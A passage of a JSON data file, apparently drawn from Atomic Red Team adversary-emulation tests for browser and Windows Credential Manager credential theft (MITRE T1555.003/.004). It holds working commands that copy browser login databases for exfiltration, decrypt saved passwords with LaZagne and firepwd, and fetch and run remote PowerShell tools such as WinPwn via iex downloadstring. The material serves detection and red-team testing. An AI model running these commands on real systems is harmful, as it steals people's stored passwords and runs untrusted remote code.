\"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbrowserpwn -consoleoutput -noninteractive", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555.003", + "display_name": "Credentials from Password Stores: Credentials from Web Browsers", + "atomic_tests": [ + { + "name": "Run Chrome-password Collector", + "auto_generated_guid": "8c05b133-d438-47ca-a630-19cc464c4622", + "description": "A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.\n\nSuccessful execution will produce stdout message stating \"Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly\". Upon completion, final output will be a file modification of $env:TEMP\\sysinternals\\passwordsdb.\n\nAdapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "File path for modified Sysinternals", + "type": "String", + "default": "$env:TEMP" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Modified Sysinternals must be located at #{file_path}\n", + "prereq_command": "if (Test-Path #{file_path}\\SysInternals) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip\" -OutFile \"#{file_path}\\Modified-SysInternalsSuite.zip\"\nExpand-Archive #{file_path}\\Modified-SysInternalsSuite.zip #{file_path}\\sysinternals -Force\nRemove-Item #{file_path}\\Modified-SysInternalsSuite.zip -Force\n" + } + ], + "executor": { + "command": "Set-Location -path \"#{file_path}\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", + "cleanup_command": "Remove-Item #{file_path}\\Sysinternals -Force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Search macOS Safari Cookies", + "auto_generated_guid": "c1402f7b-67ca-43a8-b5f3-3143abedc01b", + "description": "This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.\n\nUpon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "search_string": { + "description": "String to search Safari cookies to find.", + "type": "String", + "default": "coinbase" + } + }, + "executor": { + "command": "cd ~/Library/Cookies\ngrep -q \"#{search_string}\" \"Cookies.binarycookies\"\n", + "name": "sh" + } + }, + { + "name": "LaZagne - Credentials from Browser", + "auto_generated_guid": "9a2915b3-3954-4cce-8c76-00fbf4dbd014", + "description": "The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.\nLaZagne is an open source application used to retrieve passwords stored on a local computer. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "lazagne_path": { + "description": "Path to LaZagne", + "type": "Path", + "default": "PathToAtomicsFolder\\T1555.003\\bin\\LaZagne.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "LaZagne.exe must exist on disk at specified location (#{lazagne_path})\n", + "prereq_command": "if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe\" -OutFile \"#{lazagne_path}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "#{lazagne_path} browsers\n" + } + }, + { + "name": "Simulating access to Chrome Login Data", + "auto_generated_guid": "3d111226-d09a-4911-8715-fe11664f960d", + "description": "Simulates an adversary accessing encrypted credentials from Google Chrome Login database. \n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Chrome must be installed\n", + "prereq_command": "if ((Test-Path \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\")) {exit 0} else {exit 1}", + "get_prereq_command": "$installer = \"$env:temp\\ChromeStandaloneSetup64.msi\"\nInvoke-WebRequest -OutFile $env:temp\\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi\nmsiexec /i $installer /qn\nStart-Process -FilePath \"chrome.exe\"\nStop-Process -Name \"chrome\"\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination $env:temp\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination $env:temp\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Login Data\" -Force -ErrorAction Ignore\nRemove-Item -Path \"$env:temp\\Login Data For Account\" -Force -ErrorAction Ignore\n" + } + }, + { + "name": "Simulating access to Opera Login Data", + "auto_generated_guid": "28498c17-57e4-495a-b0be-cc1e36de408b", + "description": "Simulates an adversary accessing encrypted credentials from Opera web browser's login database. \n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Opera must be installed\n", + "prereq_command": "if (((Test-Path \"$env:LOCALAPPDATA\\Programs\\Opera\\launcher.exe\") -Or (Test-Path \"C:\\Program Files\\Opera\\launcher.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Opera\\launcher.exe\"))) {exit 0} else {exit 1}", + "get_prereq_command": "$installer = \"$env:temp\\OperaStandaloneInstaller.exe\"\nInvoke-WebRequest -OutFile $env:temp\\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe\nStart-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'\nStart-Sleep -s 180\nStop-Process -Name \"opera\"\n" + }, + { + "description": "Opera login data file must exist\n", + "prereq_command": "if (Test-Path \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\") {exit 0} else {exit 1}", + "get_prereq_command": "New-Item -Path \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -ItemType File\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination $env:temp\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Login Data\" -Force -ErrorAction Ignore\n" + } + }, + { + "name": "Simulating access to Windows Firefox Login Data", + "auto_generated_guid": "eb8da98a-2e16-4551-b3dd-83de49baa14c", + "description": "Simulates an adversary accessing encrypted credentials from firefox web browser's login database.\nmore info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Firefox must be installed\n", + "prereq_command": "if ((Test-Path \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\")) {exit 0} else {exit 1}", + "get_prereq_command": "if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url=\"https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US\"}else {$url=\"https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US\"}\n$installer = \"$env:temp\\firefoxsetup.exe\"\n(New-Object Net.WebClient).DownloadFile($url,$installer)\nStart-Process $installer -ArgumentList '/S' -Wait\n" + }, + { + "description": "Firefox login data file must exist\n", + "prereq_command": "if (Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\") {exit 0} else {exit 1}", + "get_prereq_command": "if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox=\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"}else {$firefox=\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\"}\nStart-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait\nStart-Process $firefox -NoNewWindow\nStart-Sleep -s 20\nStop-Process -Name firefox\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination $env:temp -Force -Recurse\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Profiles\" -Force -ErrorAction Ignore -Recurse\n" + } + }, + { + "name": "Simulating access to Windows Edge Login Data", + "auto_generated_guid": "a6a5ec26-a2d1-4109-9d35-58b867689329", + "description": "Simulates an adversary accessing encrypted credentials from Edge web browser's login database.\nmore info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Edge must be installed\n", + "prereq_command": "if (Test-Path \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\") {exit 0} else {exit 1}", + "get_prereq_command": "\"Installation is not implemented as Edge is a part of windows\"\n" + }, + { + "description": "Edge login data file must exist\n", + "prereq_command": "if (Test-Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\") {exit 0} else {exit 1}", + "get_prereq_command": "$edge=\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\nStart-Process $edge \nStart-Sleep -s 20\nStop-Process -Name msedge\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination $env:temp\\Edge -Force -Recurse\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Edge\" -Force -ErrorAction Ignore -Recurse\n" + } + }, + { + "name": "Decrypt Mozilla Passwords with Firepwd.py", + "auto_generated_guid": "dc9cd677-c70f-4df5-bd1c-f114af3c2381", + "description": "Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.\nUpon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Firepwd_Path": { + "description": "Filepath for Firepwd.py", + "type": "String", + "default": "$env:temp\\Firepwd.py" + }, + "Out_Filepath": { + "description": "Filepath to output results to", + "type": "String", + "default": "$env:temp\\T1555.003Test8.txt" + }, + "VS_CMD_Path": { + "description": "Filepath to Visual Studio Build Tools Command prompt", + "type": "String", + "default": "C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\BuildTools\\VC\\Auxiliary\\Build\\vcvars64.bat" + }, + "Python_Path": { + "description": "Filepath to python", + "type": "String", + "default": "C:\\Program Files\\Python310\\python.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Firepwd must exist at #{Firepwd_Path}\n", + "prereq_command": "if (Test-Path \"#{Firepwd_Path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py\" -outfile \"#{Firepwd_Path}\"\n" + }, + { + "description": "Firefox profile directory must be present\n", + "prereq_command": "if (get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\" -erroraction silentlycontinue) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi\" -outfile \"$env:temp\\firefox.msi\"\nmsiexec.exe /i \"$env:temp\\firefox.msi\" /quiet\nsleep -s 30\nstart-process \"$env:programfiles\\Mozilla Firefox\\firefox.exe\".\nsleep -s 5\nstop-process -name \"firefox\"\n" + }, + { + "description": "Visual Studio Build Tools command prompt must exist at #{VS_CMD_Path}\n", + "prereq_command": "if (Test-Path \"#{VS_CMD_Path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "invoke-webrequest \"https://aka.ms/vs/17/release/vs_BuildTools.exe\" -outfile \"$env:temp\\VS_BuildTools.exe\"\nwrite-host \"Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from $env:temp\\VS_BuildTools.exe.\"\n" + }, + { + "description": "Python must be installed\n", + "prereq_command": "if (Test-Path \"#{Python_Path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "invoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"$env:temp\\python_setup.exe\"\nStart-Process -FilePath $env:TEMP\\python_setup.exe -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" + }, + { + "description": "Pip must be installed.\n", + "prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip -v) {exit 0} else {exit 1}\n", + "get_prereq_command": "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"$env:temp\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"$env:temp\\get-pip.py\"\ncmd /c \"$env:temp\\ez_setup.py\"\ncmd /c \"$env:temp\\get-pip.py\"\n" + }, + { + "description": "Pycryptodome library must be installed \n", + "prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip show pycryptodome) {exit 0} else {exit 1}\n", + "get_prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (test-path \"#{VS_CMD_Path}\"){pip install pycryptodome | out-null | cmd /c %comspec% /k \"#{VS_CMD_Path}\" | out-null} else {write-host \"Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq\"}\n" + }, + { + "description": "Pyasn1 library must be installed \n", + "prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip show pyasn1) {exit 0} else {exit 1}\n", + "get_prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (test-path \"#{VS_CMD_Path}\"){pip install pyasn1 | out-null | cmd /c %comspec% /k \"#{VS_CMD_Path}\" | out-null} else {write-host \"Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq.\"}\n" + } + ], + "executor": { + "name": "powershell", + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "cleanup_command": "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue \n" + } + }, + { + "name": "LaZagne.py - Dump Credentials from Firefox Browser", + "auto_generated_guid": "87e88698-621b-4c45-8a89-4eaebdeaabb1", + "description": "Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "lazagne_path": { + "description": "Path you put LaZagne Github with LaZagne.py", + "type": "String", + "default": "/tmp/LaZagne/Linux" + }, + "specific_module": { + "description": "You may change the module to \"all\" for all password that can be found by LaZagne.py", + "type": "string", + "default": "browsers -firefox" + }, + "output_file": { + "description": "This is where output for the Firefox passwords goes", + "type": "String", + "default": "/tmp/firefox_password.txt" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Get Lazagne from Github and install requirements", + "prereq_command": "test -f #{lazagne_path}/laZagne.py", + "get_prereq_command": "cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt" + }, + { + "description": "Needs git, python3 and some pip stuff", + "prereq_command": "which git && which python3 && which pip", + "get_prereq_command": "apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto" + } + ], + "executor": { + "command": "python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}", + "cleanup_command": "rm -R /tmp/LaZagne; rm -f #{output_file}", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Stage Popular Credential Files for Exfiltration", + "auto_generated_guid": "f543635c-1705-42c3-b180-efd6dc6e7ee7", + "description": "This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,\nsimulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "command": "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\T1555.003.zip\" -force -erroraction silentlycontinue \nRemove-Item -Path \"$env:temp\\T1555.003\\\" -force -recurse -erroraction silentlycontinue\n" + } + }, + { + "name": "WinPwn - BrowserPwn", + "auto_generated_guid": "764ea176-fb71-494c-90ea-72e9d85dce76", + "description": "Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbrowserpwn -consoleoutput -noninteractive", + "cleanup_command": "rm .\\System.Data.SQLite.dll -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - mimi-kittenz", + "auto_generated_guid": "ec1d0b37-f659-4186-869f-31a554891611", + "description": "Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Sharpweb for Browser Credentials", + "auto_generated_guid": "e5e3d639-6ea8-4408-9ecd-d5a286268ca0", + "description": "PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", + "name": "powershell" + } + }, + { + "name": "Simulating Access to Chrome Login Data - MacOS", + "auto_generated_guid": "124e13e5-d8a1-4378-a6ee-a53cd0c7e369", + "description": "This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. \nOnce the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. \nSee https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ . \n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n", + "cleanup_command": "rm \"/tmp/T1555.003_Login Data\" >/dev/null 2>&1\nrm \"/tmp/T1555.003_Login Data For Account\" >/dev/null 2>&1\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1555.004", + "command_list": [ + "vaultcmd /listcreds:\"Windows Credentials\"\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')\nInvoke-WCMDump" + ], + "commands": [ + { + "command": "vaultcmd /listcreds:\"Windows Credentials\"\n", + "source": "atomics/T1555.004/T1555.004.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Windows Credential Manager" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')\nInvoke-WCMDump", + "source": "atomics/T1555.004/T1555.004.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Windows Credential Manager" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555.004", + "display_name": "Credentials from Password Stores: Windows Credential Manager", + "atomic_tests": [ + { + "name": "Access Saved Credentials via VaultCmd", + "auto_generated_guid": "9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe\nCredential Manager stores credentials for signing into websites, applications, and/or devices 